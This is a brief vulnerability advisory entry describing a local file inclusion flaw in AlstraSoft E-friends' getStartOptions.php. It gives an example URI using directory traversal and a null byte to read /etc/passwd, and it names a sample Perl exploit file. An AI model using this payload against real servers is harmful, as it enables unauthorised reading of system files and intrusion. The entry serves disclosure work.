AlstraSoft E-friends 'GetStartOptions.php' Local File Include Vulnerability

AlstraSoft E-friends 'GetStartOptions.php' Local File Include Vulnerability

Attackers can exploit this issue via a web client.

The following example URI is available:

http://www.example.com/path/chat/getStartOptions.php?lang=../../../../../../../../../etc/passwd%00

The following sample exploit is available:

/data/vulnerabilities/exploits/alstrasoft.efriends-lteq4.85-dirtrav.pl